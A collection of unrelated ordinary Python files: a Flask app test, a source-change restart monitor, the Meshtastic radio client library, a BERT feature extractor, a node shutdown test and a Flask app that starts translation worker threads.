import multiprocessing import os import time from unittest import mock import requests from coworks.utils import import_attr class TestClass: @mock.patch.dict(os.environ, {"FLASK_RUN_FROM_CLI": "false", "AWS_XRAY_SDK_ENABLED": "false"}) def test_run_complete(self, samples_docs_dir, unused_tcp_port): app = import_attr('complete', 'app', cwd=samples_docs_dir) server = multiprocessing.Process(target=run_server, args=(app, unused_tcp_port), daemon=False) server.start() counter = 1 time.sleep(counter) while not server.is_alive() and counter < 3: time.sleep(counter) counter += 1 response = requests.get(f'http://localhost:{unused_tcp_port}/', headers={'Authorization': "token"}) assert response.text == "Stored value 0.\n" response = requests.get(f'http://localhost:{unused_tcp_port}/admin/route', headers={'Authorization': "token"}) assert response.status_code == 200 server.terminate() def run_server(app, port): print(f"Server starting on port {port}") app.run(host='localhost', port=port, use_reloader=False, debug=False)
monitor.py
# Automatically restart when the source code changes. # From http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode import os import sys import time import signal import threading import atexit import Queue _interval = 1.0 _times = {} _files = [] _running = False _queue = Queue.Queue() _lock = threading.Lock() def _restart(path): _queue.put(True) prefix = 'monitor (pid=%d):' % os.getpid() print >> sys.stderr, '%s Change detected to \'%s\'.' % (prefix, path) print >> sys.stderr, '%s Triggering process restart.' % prefix os.kill(os.getpid(), signal.SIGINT) def _modified(path): try: # If path doesn't denote a file and were previously # tracking it, then it has been removed or the file type # has changed so force a restart. If not previously # tracking the file then we can ignore it as probably # pseudo reference such as when file extracted from a # collection of modules contained in a zip file. if not os.path.isfile(path): return path in _times # Check for when file last modified. mtime = os.stat(path).st_mtime if path not in _times: _times[path] = mtime # Force restart when modification time has changed, even # if time now older, as that could indicate older file # has been restored. if mtime != _times[path]: return True except: # If any exception occured, likely that file has been # been removed just before stat(), so force a restart. return True return False def _monitor(): while 1: # Check modification times on all files in sys.modules. for module in sys.modules.values(): if not hasattr(module, '__file__'): continue path = getattr(module, '__file__') if not path: continue if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']: path = path[:-1] if _modified(path): return _restart(path) # Check modification times on files which have # specifically been registered for monitoring. for path in _files: if _modified(path): return _restart(path) # Go to sleep for specified interval. try: return _queue.get(timeout=_interval) except: pass _thread = threading.Thread(target=_monitor) _thread.setDaemon(True) def _exiting(): try: _queue.put(True) except: pass _thread.join() atexit.register(_exiting) def track(path): if not path in _files: _files.append(path) def start(interval=1.0): global _interval if interval < _interval: _interval = interval global _running _lock.acquire() if not _running: prefix = 'monitor (pid=%d):' % os.getpid() print >> sys.stderr, '%s Starting change monitor.' % prefix _running = True _thread.start() _lock.release()
__init__.py
""" # an API for Meshtastic devices Primary class: SerialInterface Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)" Source code on [github](https://github.com/meshtastic/Meshtastic-python) properties of SerialInterface: - radioConfig - Current radio configuration and device settings, if you write to this the new settings will be applied to the device. - nodes - The database of received nodes. Includes always up-to-date location and username information for each node in the mesh. This is a read-only datastructure. - myNodeInfo - Contains read-only information about the local radio device (software version, hardware version, etc) # Published PubSub topics We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available topics: - meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB - meshtastic.connection.lost - published once we've lost our link to the radio - meshtastic.receive.text(packet) - delivers a received packet as a dictionary, if you only care about a particular type of packet, you should subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive". - meshtastic.receive.position(packet) - meshtastic.receive.user(packet) - meshtastic.receive.data(packet) - meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...) We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet you'll see the fields in the dictionary. decoded.data.payload will contain the raw bytes that were sent. If the packet was sent with sendText, decoded.data.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for unicode scripts they can be different. # Example Usage ``` import meshtastic from pubsub import pub def onReceive(packet, interface): # called when a packet arrives print(f"Received: {packet}") def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio # defaults to broadcast, specify a destination ID if you wish interface.sendText("hello mesh") pub.subscribe(onReceive, "meshtastic.receive") pub.subscribe(onConnection, "meshtastic.connection.established") # By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0 interface = meshtastic.SerialInterface() ``` """ import socket import pygatt import google.protobuf.json_format import serial import threading import logging import time import sys import traceback import time import base64 import platform from . import mesh_pb2 from . import util from pubsub import pub from dotmap import DotMap START1 = 0x94 START2 = 0xc3 HEADER_LEN = 4 MAX_TO_FROM_RADIO_SIZE = 512 BROADCAST_ADDR = "^all" # A special ID that means broadcast # if using 8 bit nodenums this will be shortend on the target BROADCAST_NUM = 0xffffffff MY_CONFIG_ID = 42 """The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand""" OUR_APP_VERSION = 172 class MeshInterface: """Interface class for meshtastic devices Properties: isConnected nodes debugOut """ def __init__(self, debugOut=None, noProto=False): """Constructor""" self.debugOut = debugOut self.nodes = None # FIXME self.isConnected = False if not noProto: self._startConfig() def sendText(self, text, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False): """Send a utf8 string to some other node, if the node has a display it will also be shown on the device. Arguments: text {string} -- The text to send Keyword Arguments: destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR}) wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery) Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks. """ return self.sendData(text.encode("utf-8"), destinationId, dataType=mesh_pb2.Data.CLEAR_TEXT, wantAck=wantAck, wantResponse=wantResponse) def sendData(self, byteData, destinationId=BROADCAST_ADDR, dataType=mesh_pb2.Data.OPAQUE, wantAck=False, wantResponse=False): """Send a data packet to some other node Keyword Arguments: destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR}) wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery) Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks. """ meshPacket = mesh_pb2.MeshPacket() meshPacket.decoded.data.payload = byteData meshPacket.decoded.data.typ = dataType meshPacket.decoded.want_response = wantResponse return self.sendPacket(meshPacket, destinationId, wantAck=wantAck) def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False): """ Send a position packet to some other node (normally a broadcast) Also, the device software will notice this packet and use it to automatically set its notion of the local position. If timeSec is not specified (recommended), we will use the local machine time. Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks. """ meshPacket = mesh_pb2.MeshPacket() if(latitude != 0.0): meshPacket.decoded.position.latitude_i = int(latitude / 1e-7) if(longitude != 0.0): meshPacket.decoded.position.longitude_i = int(longitude / 1e-7) if(altitude != 0): meshPacket.decoded.position.altitude = int(altitude) if timeSec == 0: timeSec = time.time() # returns unix timestamp in seconds meshPacket.decoded.position.time = int(timeSec) meshPacket.decoded.want_response = wantResponse return self.sendPacket(meshPacket, destinationId, wantAck=wantAck) def sendPacket(self, meshPacket, destinationId=BROADCAST_ADDR, wantAck=False): """Send a MeshPacket to the specified node (or if unspecified, broadcast). You probably don't want this - use sendData instead. Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks. """ toRadio = mesh_pb2.ToRadio() # FIXME add support for non broadcast addresses if isinstance(destinationId, int): nodeNum = destinationId elif destinationId == BROADCAST_ADDR: nodeNum = BROADCAST_NUM else: nodeNum = self.nodes[destinationId]['num'] meshPacket.to = nodeNum meshPacket.want_ack = wantAck # if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID # so the message can be tracked. if meshPacket.id == 0: meshPacket.id = self._generatePacketId() toRadio.packet.CopyFrom(meshPacket) self._sendToRadio(toRadio) return meshPacket def writeConfig(self): """Write the current (edited) radioConfig to the device""" if self.radioConfig == None: raise Exception("No RadioConfig has been read") t = mesh_pb2.ToRadio() t.set_radio.CopyFrom(self.radioConfig) self._sendToRadio(t) @property def channelURL(self): """The sharable URL that describes the current channel """ bytes = self.radioConfig.channel_settings.SerializeToString() s = base64.urlsafe_b64encode(bytes).decode('ascii') return f"https://www.meshtastic.org/c/#{s}" def _generatePacketId(self): """Get a new unique packet ID""" if self.currentPacketId is None: raise Exception("Not connected yet, can not generate packet") else: self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff return self.currentPacketId def _disconnected(self): """Called by subclasses to tell clients this interface has disconnected""" self.isConnected = False pub.sendMessage("meshtastic.connection.lost", interface=self) def _connected(self): """Called by this class to tell clients we are now fully connected to a node """ self.isConnected = True pub.sendMessage("meshtastic.connection.established", interface=self) def _startConfig(self): """Start device packets flowing""" self.myInfo = None self.nodes = {} # nodes keyed by ID self._nodesByNum = {} # nodes keyed by nodenum self.radioConfig = None self.currentPacketId = None startConfig = mesh_pb2.ToRadio() startConfig.want_config_id = MY_CONFIG_ID # we don't use this value self._sendToRadio(startConfig) def _sendToRadio(self, toRadio): """Send a ToRadio protobuf to the device""" logging.error(f"Subclass must provide toradio: {toRadio}") def _handleFromRadio(self, fromRadioBytes): """ Handle a packet that arrived from the radio(update model and publish events) Called by subclasses.""" fromRadio = mesh_pb2.FromRadio() fromRadio.ParseFromString(fromRadioBytes) asDict = google.protobuf.json_format.MessageToDict(fromRadio) logging.debug(f"Received: {asDict}") if fromRadio.HasField("my_info"): self.myInfo = fromRadio.my_info if self.myInfo.min_app_version > OUR_APP_VERSION: raise Exception( "This device needs a newer python client, please \"pip install --upgrade meshtastic\"") # start assigning our packet IDs from the opposite side of where our local device is assigning them self.currentPacketId = ( self.myInfo.current_packet_id + 0x80000000) & 0xffffffff elif fromRadio.HasField("radio"): self.radioConfig = fromRadio.radio elif fromRadio.HasField("node_info"): node = asDict["nodeInfo"] try: self._fixupPosition(node["position"]) except: logging.debug("Node without position") self._nodesByNum[node["num"]] = node if "user" in node: # Some nodes might not have user/ids assigned yet self.nodes[node["user"]["id"]] = node elif fromRadio.config_complete_id == MY_CONFIG_ID: # we ignore the config_complete_id, it is unneeded for our stream API fromRadio.config_complete_id self._connected() elif fromRadio.HasField("packet"): self._handlePacketFromRadio(fromRadio.packet) elif fromRadio.rebooted: # Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port MeshInterface._disconnected(self) self._startConfig() # redownload the node db etc... else: logging.debug("Unexpected FromRadio payload") def _fixupPosition(self, position): """Convert integer lat/lon into floats Arguments: position {Position dictionary} -- object ot fix up """ if "latitudeI" in position: position["latitude"] = position["latitudeI"] * 1e-7 if "longitudeI" in position: position["longitude"] = position["longitudeI"] * 1e-7 def _nodeNumToId(self, num): """Map a node node number to a node ID Arguments: num {int} -- Node number Returns: string -- Node ID """ if num == BROADCAST_NUM: return BROADCAST_ADDR try: return self._nodesByNum[num]["user"]["id"] except: logging.warn("Node not found for fromId") return None def _getOrCreateByNum(self, nodeNum): """Given a nodenum find the NodeInfo in the DB (or create if necessary)""" if nodeNum == BROADCAST_NUM: raise Exception("Can not create/find nodenum by the broadcast num") if nodeNum in self._nodesByNum: return self._nodesByNum[nodeNum] else: n = {"num": nodeNum} # Create a minimial node db entry self._nodesByNum[nodeNum] = n return n def _handlePacketFromRadio(self, meshPacket): """Handle a MeshPacket that just arrived from the radio Will publish one of the following events: - meshtastic.receive.text(packet = MeshPacket dictionary) - meshtastic.receive.position(packet = MeshPacket dictionary) - meshtastic.receive.user(packet = MeshPacket dictionary) - meshtastic.receive.data(packet = MeshPacket dictionary) """ asDict = google.protobuf.json_format.MessageToDict(meshPacket) # /add fromId and toId fields based on the node ID asDict["fromId"] = self._nodeNumToId(asDict["from"]) asDict["toId"] = self._nodeNumToId(asDict["to"]) # We could provide our objects as DotMaps - which work with . notation or as dictionaries # asObj = DotMap(asDict) topic = "meshtastic.receive" # Generic unknown packet type if meshPacket.decoded.HasField("position"): topic = "meshtastic.receive.position" p = asDict["decoded"]["position"] self._fixupPosition(p) # update node DB as needed self._getOrCreateByNum(asDict["from"])["position"] = p if meshPacket.decoded.HasField("user"): topic = "meshtastic.receive.user" u = asDict["decoded"]["user"] # update node DB as needed n = self._getOrCreateByNum(asDict["from"]) n["user"] = u # We now have a node ID, make sure it is uptodate in that table self.nodes[u["id"]] = u if meshPacket.decoded.HasField("data"): topic = "meshtastic.receive.data" # OPAQUE is the default protobuf typ value, and therefore if not set it will not be populated at all # to make API usage easier, set it to prevent confusion if not "typ" in asDict["decoded"]["data"]: asDict["decoded"]["data"]["typ"] = "OPAQUE" # For text messages, we go ahead and decode the text to ascii for our users if asDict["decoded"]["data"]["typ"] == "CLEAR_TEXT": topic = "meshtastic.receive.text" # We don't throw if the utf8 is invalid in the text message. Instead we just don't populate # the decoded.data.text and we log an error message. This at least allows some delivery to # the app and the app can deal with the missing decoded representation. # # Usually btw this problem is caused by apps sending binary data but setting the payload type to # text. try: asDict["decoded"]["data"]["text"] = meshPacket.decoded.data.payload.decode("utf-8") except Exception as ex: logging.error(f"Malformatted utf8 in text message: {ex}") pub.sendMessage(topic, packet=asDict, interface=self) # Our standard BLE characteristics TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7" FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5" FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453" class BLEInterface(MeshInterface): """A not quite ready - FIXME - BLE interface to devices""" def __init__(self, address, debugOut=None): self.address = address self.adapter = pygatt.GATTToolBackend() # BGAPIBackend() self.adapter.start() logging.debug(f"Connecting to {self.address}") self.device = self.adapter.connect(address) logging.debug("Connected to device") # fromradio = self.device.char_read(FROMRADIO_UUID) MeshInterface.__init__(self, debugOut=debugOut) self._readFromRadio() # read the initial responses def handle_data(handle, data): self._handleFromRadio(data) self.device.subscribe(FROMNUM_UUID, callback=handle_data) def _sendToRadio(self, toRadio): """Send a ToRadio protobuf to the device""" logging.debug(f"Sending: {toRadio}") b = toRadio.SerializeToString() self.device.char_write(TORADIO_UUID, b) def close(self): self.adapter.stop() def _readFromRadio(self): wasEmpty = False while not wasEmpty: b = self.device.char_read(FROMRADIO_UUID) wasEmpty = len(b) == 0 if not wasEmpty: self._handleFromRadio(b) class StreamInterface(MeshInterface): """Interface class for meshtastic devices over a stream link (serial, TCP, etc)""" def __init__(self, debugOut=None, noProto=False, connectNow=True): """Constructor, opens a connection to self.stream Keyword Arguments: devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None}) debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None}) Raises: Exception: [description] Exception: [description] """ if not hasattr(self, 'stream'): raise Exception( "StreamInterface is now abstract (to update existing code create SerialInterface instead)") self._rxBuf = bytes() # empty self._wantExit = False self._rxThread = threading.Thread(target=self.__reader, args=()) MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto) # Start the reader thread after superclass constructor completes init if connectNow: self.connect() def connect(self): """Connect to our radio Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually start the reading thread later. """ # Send some bogus UART characters to force a sleeping device to wake self._writeBytes(bytes([START1, START1, START1, START1])) time.sleep(0.1) # wait 100ms to give device time to start running self._rxThread.start() def _disconnected(self): """We override the superclass implementation to close our port""" MeshInterface._disconnected(self) logging.debug("Closing our port") if not self.stream is None: self.stream.close() def _writeBytes(self, b): """Write an array of bytes to our stream and flush""" self.stream.write(b) self.stream.flush() def _readBytes(self, len): """Read an array of bytes from our stream""" return self.stream.read(len) def _sendToRadio(self, toRadio): """Send a ToRadio protobuf to the device""" logging.debug(f"Sending: {toRadio}") b = toRadio.SerializeToString() bufLen = len(b) # We convert into a string, because the TCP code doesn't work with byte arrays header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff]) self._writeBytes(header + b) def close(self): """Close a connection to the device""" logging.debug("Closing serial stream") # pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us self._wantExit = True if self._rxThread != threading.current_thread(): self._rxThread.join() # wait for it to exit def __reader(self): """The reader thread that reads bytes from our stream""" empty = bytes() try: while not self._wantExit: b = self._readBytes(1) if len(b) > 0: # logging.debug(f"read returned {b}") c = b[0] ptr = len(self._rxBuf) # Assume we want to append this byte, fixme use bytearray instead self._rxBuf = self._rxBuf + b if ptr == 0: # looking for START1 if c != START1: self._rxBuf = empty # failed to find start if self.debugOut != None: try: self.debugOut.write(b.decode("utf-8")) except: self.debugOut.write('?') elif ptr == 1: # looking for START2 if c != START2: self._rxBuf = empty # failed to find start2 elif ptr >= HEADER_LEN: # we've at least got a header # big endian length follos header packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3] if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length if packetlen > MAX_TO_FROM_RADIO_SIZE: self._rxBuf = empty # length ws out out bounds, restart if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN: try: self._handleFromRadio(self._rxBuf[HEADER_LEN:]) except Exception as ex: logging.error( f"Error while handling message from radio {ex}") traceback.print_exc() self._rxBuf = empty else: # logging.debug(f"timeout") pass except serial.SerialException as ex: logging.warn( f"Meshtastic serial port disconnected, disconnecting... {ex}") finally: logging.debug("reader is exiting") self._disconnected() class SerialInterface(StreamInterface): """Interface class for meshtastic devices over a serial link""" def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True): """Constructor, opens a connection to a specified serial port, or if unspecified try to find one Meshtastic device by probing Keyword Arguments: devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None}) debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None}) """ if devPath is None: ports = util.findPorts() if len(ports) == 0: raise Exception("No Meshtastic devices detected") elif len(ports) > 1: raise Exception( f"Multiple ports detected, you must specify a device, such as {ports[0].device}") else: devPath = ports[0] logging.debug(f"Connecting to {devPath}") # Note: we provide None for port here, because we will be opening it later self.stream = serial.Serial( None, 921600, exclusive=True, timeout=0.5) # rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset self.stream.port = devPath # OS-X seems to have a bug in its serial driver. It ignores that we asked for no RTSCTS # control and will always drive RTS either high or low (rather than letting the CP102 leave # it as an open-collector floating pin). Since it is going to drive it anyways we want to make # sure it is driven low, so that the TBEAM won't reset if platform.system() == 'Darwin': self.stream.rts = False self.stream.open() StreamInterface.__init__( self, debugOut=debugOut, noProto=noProto, connectNow=connectNow) def _disconnected(self): """We override the superclass implementation to close our port""" if platform.system() == 'Darwin': self.stream.rts = True # Return RTS high, so that the reset button still works StreamInterface._disconnected(self) class TCPInterface(StreamInterface): """Interface class for meshtastic devices over a TCP link""" def __init__(self, hostname, debugOut=None, noProto=False, connectNow=True, portNumber=4403): """Constructor, opens a connection to a specified IP address/hostname Keyword Arguments: hostname {string} -- Hostname/IP address of the device to connect to """ logging.debug(f"Connecting to {hostname}") server_address = (hostname, portNumber) sock = socket.create_connection(server_address) # Instead of wrapping as a stream, we use the native socket API # self.stream = sock.makefile('rw') self.stream = None self.socket = sock StreamInterface.__init__( self, debugOut=debugOut, noProto=noProto, connectNow=connectNow) def _disconnected(self): """We override the superclass implementation to close our port""" StreamInterface._disconnected(self) logging.debug("Closing our socket") if not self.socket is None: self.socket.close() def _writeBytes(self, b): """Write an array of bytes to our stream and flush""" self.socket.send(b) def _readBytes(self, len): """Read an array of bytes from our stream""" return self.socket.recv(len)
extract_feature.py
import modeling import tokenization from graph import optimize_graph import args from queue import Queue from threading import Thread import tensorflow as tf import os os.environ['CUDA_VISIBLE_DEVICES'] = '0' class InputExample(object): def __init__(self, unique_id, text_a, text_b): self.unique_id = unique_id self.text_a = text_a self.text_b = text_b class InputFeatures(object): """A single set of features of data.""" def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids): self.unique_id = unique_id self.tokens = tokens self.input_ids = input_ids self.input_mask = input_mask self.input_type_ids = input_type_ids class BertVector: def __init__(self, batch_size=32): """ init BertVector :param batch_size: Depending on your memory default is 32 """ self.max_seq_length = args.max_seq_len self.layer_indexes = args.layer_indexes self.gpu_memory_fraction = 1 self.graph_path = optimize_graph() self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True) self.batch_size = batch_size self.estimator = self.get_estimator() self.input_queue = Queue(maxsize=1) self.output_queue = Queue(maxsize=1) self.predict_thread = Thread(target=self.predict_from_queue, daemon=True) self.predict_thread.start() self.sentence_len = 0 def get_estimator(self): from tensorflow.python.estimator.estimator import Estimator from tensorflow.python.estimator.run_config import RunConfig from tensorflow.python.estimator.model_fn import EstimatorSpec def model_fn(features, labels, mode, params): with tf.gfile.GFile(self.graph_path, 'rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) input_names = ['input_ids', 'input_mask', 'input_type_ids'] output = tf.import_graph_def(graph_def, input_map={k + ':0': features[k] for k in input_names}, return_elements=['final_encodes:0']) return EstimatorSpec(mode=mode, predictions={ 'encodes': output[0] }) config = tf.ConfigProto() config.gpu_options.allow_growth = True config.gpu_options.per_process_gpu_memory_fraction = self.gpu_memory_fraction config.log_device_placement = False config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1 return Estimator(model_fn=model_fn, config=RunConfig(session_config=config), params={'batch_size': self.batch_size}) def predict_from_queue(self): prediction = self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False) for i in prediction: self.output_queue.put(i) def encode(self, sentence): self.sentence_len = len(sentence) self.input_queue.put(sentence) prediction = self.output_queue.get()['encodes'] return prediction def queue_predict_input_fn(self): return (tf.data.Dataset.from_generator( self.generate_from_queue, output_types={'unique_ids': tf.int32, 'input_ids': tf.int32, 'input_mask': tf.int32, 'input_type_ids': tf.int32}, output_shapes={ 'unique_ids': (self.sentence_len,), 'input_ids': (None, self.max_seq_length), 'input_mask': (None, self.max_seq_length), 'input_type_ids': (None, self.max_seq_length)}).prefetch(10)) def generate_from_queue(self): while True: features = list(self.convert_examples_to_features(seq_length=self.max_seq_length, tokenizer=self.tokenizer)) yield { 'unique_ids': [f.unique_id for f in features], 'input_ids': [f.input_ids for f in features], 'input_mask': [f.input_mask for f in features], 'input_type_ids': [f.input_type_ids for f in features] } def input_fn_builder(self, features, seq_length): """Creates an `input_fn` closure to be passed to Estimator.""" all_unique_ids = [] all_input_ids = [] all_input_mask = [] all_input_type_ids = [] for feature in features: all_unique_ids.append(feature.unique_id) all_input_ids.append(feature.input_ids) all_input_mask.append(feature.input_mask) all_input_type_ids.append(feature.input_type_ids) def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] num_examples = len(features) # This is for demo purposes and does NOT scale to large data sets. We do # not use Dataset.from_generator() because that uses tf.py_func which is # not TPU compatible. The right way to load data is with TFRecordReader. d = tf.data.Dataset.from_tensor_slices({ "unique_ids": tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32), "input_ids": tf.constant( all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32), "input_mask": tf.constant( all_input_mask, shape=[num_examples, seq_length], dtype=tf.int32), "input_type_ids": tf.constant( all_input_type_ids, shape=[num_examples, seq_length], dtype=tf.int32), }) d = d.batch(batch_size=batch_size, drop_remainder=False) return d return input_fn def model_fn_builder(self, bert_config, init_checkpoint, layer_indexes): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" unique_ids = features["unique_ids"] input_ids = features["input_ids"] input_mask = features["input_mask"] input_type_ids = features["input_type_ids"] jit_scope = tf.contrib.compiler.jit.experimental_jit_scope with jit_scope(): model = modeling.BertModel( config=bert_config, is_training=False, input_ids=input_ids, input_mask=input_mask, token_type_ids=input_type_ids) if mode != tf.estimator.ModeKeys.PREDICT: raise ValueError("Only PREDICT modes are supported: %s" % (mode)) tvars = tf.trainable_variables() (assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) all_layers = model.get_all_encoder_layers() predictions = { "unique_id": unique_ids, } for (i, layer_index) in enumerate(layer_indexes): predictions["layer_output_%d" % i] = all_layers[layer_index] from tensorflow.python.estimator.model_fn import EstimatorSpec output_spec = EstimatorSpec(mode=mode, predictions=predictions) return output_spec return model_fn def convert_examples_to_features(self, seq_length, tokenizer): """Loads a data file into a list of `InputBatch`s.""" features = [] input_masks = [] examples = self._to_example(self.input_queue.get()) for (ex_index, example) in enumerate(examples): tokens_a = tokenizer.tokenize(example.text_a) # if the sentences's length is more than seq_length, only use sentence's left part if len(tokens_a) > seq_length - 2: tokens_a = tokens_a[0:(seq_length - 2)] # The convention in BERT is: # (a) For sequence pairs: # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP] # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1 # (b) For single sequences: # tokens: [CLS] the dog is hairy . [SEP] # type_ids: 0 0 0 0 0 0 0 # # Where "type_ids" are used to indicate whether this is the first # sequence or the second sequence. The embedding vectors for `type=0` and # `type=1` were learned during pre-training and are added to the wordpiece # embedding vector (and position vector). This is not *strictly* necessary # since the [SEP] token unambiguously separates the sequences, but it makes # it easier for the model to learn the concept of sequences. # # For classification tasks, the first vector (corresponding to [CLS]) is # used as as the "sentence vector". Note that this only makes sense because # the entire model is fine-tuned. tokens = [] input_type_ids = [] tokens.append("[CLS]") input_type_ids.append(0) for token in tokens_a: tokens.append(token) input_type_ids.append(0) tokens.append("[SEP]") input_type_ids.append(0) # Where "input_ids" are tokens's index in vocabulary input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) input_masks.append(input_mask) # Zero-pad up to the sequence length. while len(input_ids) < seq_length: input_ids.append(0) input_mask.append(0) input_type_ids.append(0) assert len(input_ids) == seq_length assert len(input_mask) == seq_length assert len(input_type_ids) == seq_length if ex_index < 5: tf.logging.info("*** Example ***") tf.logging.info("unique_id: %s" % (example.unique_id)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info( "input_type_ids: %s" % " ".join([str(x) for x in input_type_ids])) yield InputFeatures( unique_id=example.unique_id, tokens=tokens, input_ids=input_ids, input_mask=input_mask, input_type_ids=input_type_ids) def _truncate_seq_pair(self, tokens_a, tokens_b, max_length): """Truncates a sequence pair in place to the maximum length.""" # This is a simple heuristic which will always truncate the longer sequence # one token at a time. This makes more sense than truncating an equal percent # of tokens from each, since if one sequence is very short then each token # that's truncated likely contains more information than a longer sequence. while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() @staticmethod def _to_example(sentences): import re """ sentences to InputExample :param sentences: list of strings :return: list of InputExample """ unique_id = 0 for ss in sentences: line = tokenization.convert_to_unicode(ss) if not line: continue line = line.strip() text_a = None text_b = None m = re.match(r"^(.*) \|\|\| (.*)$", line) if m is None: text_a = line else: text_a = m.group(1) text_b = m.group(2) yield InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b) unique_id += 1 if __name__ == "__main__": bert = BertVector() # while True: # question = input('question: ') vectors = bert.encode(['ไฝ ๅฅฝ', 'ๅ“ˆๅ“ˆ']) print(str(vectors))
feature_shutdown.py
#!/usr/bin/env python3 # Copyright (c) 2018-2020 The thecoffeecoins Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test thecoffeecoinsd shutdown.""" from test_framework.test_framework import thecoffeecoinsTestFramework from test_framework.util import assert_equal, get_rpc_proxy from threading import Thread def test_long_call(node): block = node.waitfornewblock() assert_equal(block['height'], 0) class ShutdownTest(thecoffeecoinsTestFramework): def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 1 self.supports_cli = False def run_test(self): node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir) # Force connection establishment by executing a dummy command. node.getblockcount() Thread(target=test_long_call, args=(node,)).start() # Wait until the server is executing the above `waitfornewblock`. self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2) # Wait 1 second after requesting shutdown but not before the `stop` call # finishes. This is to ensure event loop waits for current connections # to close. self.stop_node(0, wait=1000) if __name__ == '__main__': ShutdownTest().main()
app.py
from flask import Flask from sentence_extractor.token_ext_runner import extract_tokens_thread from sentence_extractor.sentence_ext_runner import extract_sentences_thread from machine_translator.machine_translator_runner import translation_fetcher_and_writer_thread from machine_translator.machine_translator_runner import machine_translation_thread from utils.anuvaad_tools_logger import getLogger from api.tool_server_check_api import health_check_api import threading app = Flask(__name__) app.register_blueprint(health_check_api) log = getLogger() try: log.info('Starting Threads ') t1 = threading.Thread(target=extract_tokens_thread, name='token_extractor') t1.start() log.info('extract_token_thread started') t2 = threading.Thread(target=extract_sentences_thread, name='sentence_extractor') t2.start() t4 = threading.Thread(target=translation_fetcher_and_writer_thread, name='machine_translation_2') t4.start() t3 = threading.Thread(target=machine_translation_thread, name='machine_translation_1') t3.start() log.info('all_thread started ') except Exception as e: log.info('ERROR WHILE RUNNING CUSTOM THREADS '+str(e)) if __name__ == '__main__': app.run()
bulk_odk.py
